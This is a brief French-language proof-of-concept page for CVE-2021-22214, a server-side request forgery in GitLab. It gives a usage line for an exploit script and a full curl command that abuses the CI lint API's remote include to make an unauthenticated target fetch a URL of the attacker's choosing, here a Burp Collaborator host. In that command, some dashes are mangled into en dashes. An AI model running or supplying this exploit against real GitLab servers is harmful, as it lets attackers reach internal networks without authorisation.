
Preuve de concept d'exploitation pour CVE-2021-22214, une falsification de requête côté serveur dans les webhooks GitLab, permettant à des attaquants non authentifiés d'effectuer des requêtes HTTP internes.
POC pour CVE-2021-22214 : SSRF Gitlab
L'installation GitLab distante contient une vulnérabilité de type Server-side request forgery (SSRF) résultant de l'activation du réseau interne pour les webhooks. Un attaquant distant non authentifié peut exploiter une instance GitLab à inscription limitée, l'amenant à effectuer des requêtes HTTP vers un domaine arbitraire de son choix.
usage: python3 GitLab_SSRF.py <target> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'